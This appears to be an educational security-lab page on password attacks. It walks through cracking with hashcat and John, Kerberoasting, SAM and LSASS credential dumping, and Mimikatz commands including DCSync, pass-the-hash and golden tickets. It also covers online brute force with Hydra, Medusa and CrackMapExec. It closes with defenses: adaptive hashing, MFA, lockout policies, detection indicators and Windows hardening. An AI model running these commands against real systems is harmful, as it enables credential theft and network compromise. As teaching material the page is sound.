Password Attacks Lab

Password Attack Techniques

1. Dictionary Attacks

Dictionary attacks use pre-compiled wordlists containing common passwords, words, and phrases. This is typically the first attack method due to its effectiveness against weak passwords.

Common Wordlists

• rockyou.txt: 14+ million real-world passwords (145MB) - the gold standard
• SecLists: Comprehensive collection organized by category
• CrackStation: 15GB wordlist with 1.5 billion entries
• Custom wordlists: Built from target reconnaissance (company names, industry terms, locations)

Dictionary Attack Example

Copy# John the Ripper - Basic dictionary attack
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Hashcat - Dictionary attack against NTLM hashes
hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt

# Show cracked passwords
john --show hashes.txt

2. Brute Force Attacks

Brute force attacks systematically try every possible character combination. While guaranteed to succeed given enough time, they're computationally expensive and time-consuming.

Character Set Definitions

Brute Force Examples

Copy# Hashcat - 8-character brute force (all characters)
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a

# Common pattern: Uppercase + lowercase + digits (Password123)
hashcat -m 1000 -a 3 hashes.txt ?u?l?l?l?l?l?l?l?d?d?d

# Incremental attack (John) - starts short, increases length
john --incremental hashes.txt

# Mask attack targeting common pattern: Capital + 6 lowercase + 2 digits
hashcat -m 1000 -a 3 hashes.txt ?u?l?l?l?l?l?l?d?d

3. Hybrid Attacks

Hybrid attacks combine dictionary words with rule-based modifications, dramatically increasing effectiveness while maintaining reasonable speed.

Common Hybrid Patterns

• Dictionary word + numbers: password123, summer2024
• Dictionary word + special chars: password!, welcome@123
• Leetspeak substitutions: p@ssw0rd, h4ck3r
• Capitalization variants: Password, PASSWORD

Copy# Hashcat - Hybrid wordlist + mask (append numbers)
hashcat -m 1000 -a 6 hashes.txt rockyou.txt ?d?d?d?d

# Hashcat - Hybrid mask + wordlist (prepend uppercase)
hashcat -m 1000 -a 7 hashes.txt ?u?u rockyou.txt

# John - Apply rules to wordlist
john --wordlist=rockyou.txt --rules=best64 hashes.txt

4. Rainbow Table Attacks

Rainbow tables are precomputed hash databases that trade disk space for computation time. They work only against unsalted hashes.

Rainbow Table Limitations

• Salting defeats rainbow tables: Each unique salt requires a completely new table
• Storage requirements: Comprehensive tables require terabytes of storage
• Hash algorithm specific: Separate tables needed for MD5, SHA-1, NTLM, etc.

Copy# RainbowCrack - Generate rainbow tables
rtgen md5 loweralpha 1 8 0 3800 33554432 0

# RainbowCrack - Crack with rainbow tables
rcrack /path/to/tables -h 5f4dcc3b5aa765d61d8327deb882cf99

# Ophcrack (Windows) - GUI-based rainbow table tool
# Particularly effective against Windows LM/NTLM hashes

5. Rule-Based Attacks

Rule-based attacks apply transformation rules to wordlist entries, creating intelligent mutations based on common password patterns.

John the Ripper Rule Syntax

Copy# Sample John rules (john.conf)
[List.Rules:Custom]
# Capitalize first letter
c
# Toggle case of all characters
t
# Append current year
$2 $0 $2 $4
# Prepend and append !
^! $!
# Leetspeak conversion
sa@ se3 si1 so0 ss$

Hashcat Rule Examples

Copy# Hashcat - Use built-in best64 rules
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Common hashcat rule functions:
# c   - Capitalize first letter
# u   - Uppercase all
# l   - Lowercase all
# $X  - Append character X
# ^X  - Prepend character X
# sXY - Replace X with Y

# Custom rule file example (custom.rule):
c $1 $2 $3          # Capitalize + append 123
c $! $@             # Capitalize + append !@
l $2 $0 $2 $4       # Lowercase + append 2024

Windows Authentication Deep Dive

Windows Authentication Protocols

1. NTLM (NT LAN Manager)

NTLM is a challenge-response authentication protocol still widely used in Windows environments, despite being considered legacy.

NTLM Hash Format

Copy# NTLM hash example (32 hex characters)
209c6174da490caeb422f3fa5a7ae634

# Combined LM:NTLM format (from SAM)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::

# Format breakdown:
# Username : RID : LM Hash : NTLM Hash : Comment : Home Dir : (empty fields)

2. Kerberos Authentication

Kerberos is the default authentication protocol in modern Active Directory environments, using tickets instead of password hashes.

Kerberos Attack Vectors

• Kerberoasting: Request service tickets for SPNs, crack offline
• AS-REP Roasting: Extract crackable hashes from accounts without Kerberos pre-auth
• Golden Ticket: Forge TGTs using compromised KRBTGT hash
• Silver Ticket: Forge service tickets using service account hashes

Copy# Kerberoasting with impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request

# AS-REP Roasting (accounts with pre-auth disabled)
GetNPUsers.py domain.local/ -dc-ip 10.10.10.10 -request

# Crack Kerberos tickets with hashcat
hashcat -m 13100 krb5tgs.txt rockyou.txt  # TGS-REP
hashcat -m 18200 asrep.txt rockyou.txt    # AS-REP

SAM Database (Security Account Manager)

The SAM database stores local user account information and password hashes on Windows systems.

SAM File Locations

• Active SAM: C:\Windows\System32\config\SAM (locked while OS running)
• Backup: C:\Windows\System32\config\RegBack\SAM
• Volume Shadow Copy: Previous versions accessible via VSS

SAM Extraction Techniques

Copy# Method 1: Registry hives extraction (requires admin)
reg save HKLM\SAM C:\temp\sam.hive
reg save HKLM\SYSTEM C:\temp\system.hive

# Method 2: Volume Shadow Copy
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\

# Method 3: Offline extraction (boot from external OS)
# Mount drive and copy SAM/SYSTEM files

# Extract hashes using samdump2 (Linux)
samdump2 system.hive sam.hive

# Extract hashes using impacket (secretsdump.py)
secretsdump.py -sam sam.hive -system system.hive LOCAL

LSASS Memory Dumping

The Local Security Authority Subsystem Service (LSASS) process stores credentials in memory. Dumping LSASS memory can reveal plaintext passwords and hashes of logged-in users.

LSASS Dumping Methods

Copy# Method 1: Task Manager (GUI - leaves obvious traces)
# Right-click lsass.exe → Create dump file

# Method 2: ProcDump (Sysinternals - less suspicious)
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Method 3: Comsvcs.dll (Native Windows DLL)
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump  C:\temp\lsass.dmp full

# Method 4: PowerShell (requires admin)
Get-Process lsass | Out-Minidump -DumpFilePath C:\temp\

# Parse dump with Mimikatz (offline)
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Mimikatz - The Credential Extraction King

Mimikatz is the most powerful credential dumping tool for Windows environments, capable of extracting plaintext passwords, hashes, PINs, and Kerberos tickets.

Essential Mimikatz Commands

Copy# Elevate to SYSTEM privileges
privilege::debug
token::elevate

# Dump all credentials from LSASS memory
sekurlsa::logonpasswords

# Dump specific credential types
sekurlsa::wdigest           # Plaintext passwords (older Windows)
sekurlsa::msv               # NTLM hashes
sekurlsa::kerberos          # Kerberos tickets
sekurlsa::tspkg             # Terminal Services credentials

# Extract SAM database hashes
lsadump::sam

# Extract Domain Cached Credentials
lsadump::cache

# LSA Secrets (service account passwords, auto-logon)
lsadump::secrets

# DCSync attack (requires Domain Admin or equivalent)
lsadump::dcsync /domain:corp.local /user:Administrator

# Pass-the-Hash attack
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:cmd.exe

# Golden Ticket creation
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /id:500

# Extract all Kerberos tickets
sekurlsa::tickets /export

Domain Cached Credentials (DCC)

Windows caches domain credentials locally to allow logon when domain controllers are unavailable. These cached credentials can be extracted and cracked.

Copy# Extract cached credentials with Mimikatz
mimikatz # lsadump::cache

# DCC2 format (modern Windows)
# Requires 10,240 iterations of PBKDF2-HMAC-SHA1
# Significantly slower to crack than NTLM

# Crack with hashcat (mode 2100)
hashcat -m 2100 cached_creds.txt rockyou.txt

Password Cracking Tool Reference

John the Ripper

John the Ripper is a versatile, open-source password cracker that supports numerous hash types and attack modes.

Basic Usage

Copy# Basic dictionary attack
john --wordlist=rockyou.txt hashes.txt

# With rules applied
john --wordlist=rockyou.txt --rules=best64 hashes.txt

# Incremental mode (brute force)
john --incremental hashes.txt

# Show cracked passwords
john --show hashes.txt

# Specify format explicitly
john --format=NT --wordlist=rockyou.txt ntlm_hashes.txt

# Resume interrupted session
john --restore

# Check available formats
john --list=formats

# Single crack mode (username-based mangling)
john --single hashes.txt

Hash Format Examples

Copy# Unix/Linux passwords (from /etc/shadow)
root:$6$rounds=5000$salt$hash:18532:0:99999:7:::

# Windows NTLM (from SAM)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:NTLM_HASH:::

# MD5 hash
username:5d41402abc4b2a76b9719d911017c592

# SHA-512 (Linux)
$6$rounds=5000$saltsaltsal$hash_value_here

Hashcat

Hashcat is the world's fastest password cracker, supporting GPU acceleration and 300+ hash algorithms.

Common Hash Types (-m flag)

Attack Modes (-a flag)

Copy# -a 0: Straight dictionary attack
hashcat -m 1000 -a 0 hashes.txt rockyou.txt

# -a 1: Combination attack (combine two wordlists)
hashcat -m 1000 -a 1 hashes.txt wordlist1.txt wordlist2.txt

# -a 3: Brute force / mask attack
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a

# -a 6: Hybrid wordlist + mask
hashcat -m 1000 -a 6 hashes.txt rockyou.txt ?d?d?d?d

# -a 7: Hybrid mask + wordlist
hashcat -m 1000 -a 7 hashes.txt ?u?u rockyou.txt

Advanced Hashcat Techniques

Copy# Use rules file
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r best64.rule

# Session management
hashcat -m 1000 -a 0 hashes.txt rockyou.txt --session=mysession
hashcat --session=mysession --restore

# Performance tuning
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -w 3  # Workload profile (1-4)
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -O    # Optimized kernels

# Show results
hashcat -m 1000 hashes.txt --show

# Benchmark mode (test performance)
hashcat -b -m 1000

# Incremental mask attack (custom charset)
hashcat -m 1000 -a 3 hashes.txt -1 ?l?u?d ?1?1?1?1?1?1?1?1

# Output to file
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -o cracked.txt

Hydra - Online Password Attacks

THC Hydra is a parallelized network login cracker supporting numerous protocols.

Copy# SSH brute force
hydra -l admin -P passwords.txt ssh://192.168.1.100

# FTP with username list
hydra -L users.txt -P passwords.txt ftp://192.168.1.100

# HTTP POST form attack
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

# RDP attack
hydra -l administrator -P passwords.txt rdp://192.168.1.100

# SMB/Windows shares
hydra -l admin -P passwords.txt smb://192.168.1.100

# Common flags:
# -l username   : Single username
# -L userlist   : Username list file
# -p password   : Single password
# -P passlist   : Password list file
# -t threads    : Parallel connections (default: 16)
# -v            : Verbose output
# -f            : Exit after first valid login found

CrackMapExec (CME)

Swiss army knife for pentesting Windows/Active Directory networks.

Copy# Password spray across subnet
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123' --continue-on-success

# Pass-the-hash attack
crackmapexec smb 192.168.1.0/24 -u Administrator -H 'NTLM_HASH'

# Dump SAM hashes
crackmapexec smb 192.168.1.100 -u admin -p password --sam

# Dump LSA secrets
crackmapexec smb 192.168.1.100 -u admin -p password --lsa

# Execute command
crackmapexec smb 192.168.1.100 -u admin -p password -x whoami

# Enumerate shares
crackmapexec smb 192.168.1.0/24 -u guest -p '' --shares

Medusa

Fast, parallel, modular login brute-forcer.

Copy# SSH attack
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh

# Multiple hosts from file
medusa -H hosts.txt -u admin -P passwords.txt -M ssh

# HTTP authentication
medusa -h 192.168.1.100 -u admin -P passwords.txt -M http -m DIR:/admin

# Available modules
medusa -d

Interactive Password Tools

Hands-On Hash Cracking Lab

Put your knowledge into practice! Crack these sample hashes using the techniques you've learned. All hashes use passwords from common wordlists.

Password Defense Strategies

Password Policy Best Practices

Effective password policies balance security with usability:

Multi-Factor Authentication (MFA)

MFA dramatically reduces the effectiveness of password attacks by requiring additional verification factors:

MFA Factor Types

• Something you know: Password, PIN
• Something you have: Phone, hardware token, smart card
• Something you are: Biometrics (fingerprint, face, iris)
• Somewhere you are: GPS location, network location

Secure Password Storage

How passwords are stored determines their vulnerability to compromise:

Storage Method Comparison

Copy#  NEVER - Plaintext storage
password = "MyPassword123"

#  NEVER - Simple encoding (not encryption)
password = base64.b64encode("MyPassword123")

#  NEVER - Weak hashing without salt
password = md5("MyPassword123")

#  WEAK - Fast hashing (even with salt)
password = sha256("MyPassword123" + salt)

#  GOOD - Slow adaptive hashing
password = bcrypt.hashpw("MyPassword123", bcrypt.gensalt(rounds=12))

#  BEST - Modern adaptive hashing
password = argon2.hash("MyPassword123")  # Argon2id recommended

Why Adaptive Hashing?

Account Lockout and Rate Limiting

Defensive mechanisms to slow down or prevent brute force attacks:

Copy# Windows Group Policy - Account Lockout
Computer Configuration → Windows Settings → Security Settings → Account Policies → Account Lockout Policy

Account lockout threshold: 5 invalid attempts
Account lockout duration: 30 minutes
Reset account lockout counter after: 30 minutes

# Linux PAM Configuration (/etc/pam.d/common-auth)
auth required pam_tally2.so deny=5 unlock_time=1800 onerr=fail

# Web Application - Progressive Delay
def check_password(username, password, attempt_count):
    delay = min(2 ** attempt_count, 30)  # Exponential backoff, max 30s
    time.sleep(delay)
    return verify_password(username, password)

Monitoring and Detection

Detecting password attacks in progress:

Key Indicators of Compromise (IOCs)

• Multiple failed login attempts: Especially from single source or against multiple accounts
• Password spray patterns: Single password tried against many accounts
• Unusual login locations: Logins from unexpected geographic locations
• Impossible travel: Logins from distant locations within short timeframe
• Off-hours authentication: Login attempts outside normal business hours
• LSASS access: Processes accessing LSASS memory (Mimikatz indicator)
• DCSync activity: Unusual replication requests from non-DC systems

Windows Event IDs to Monitor

Credential Storage Best Practices

Windows Hardening Commands

Copy# Disable LM hash storage (requires reboot)
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d 1 /f

# Enable NTLMv2 only
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LmCompatibilityLevel /t REG_DWORD /d 5 /f

# Disable WDigest (prevent plaintext credential caching)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

# Enable Credential Guard (Windows 10 Enterprise+)
# Requires UEFI, Secure Boot, TPM 2.0
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v EnableVirtualizationBasedSecurity /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LsaCfgFlags /t REG_DWORD /d 1 /f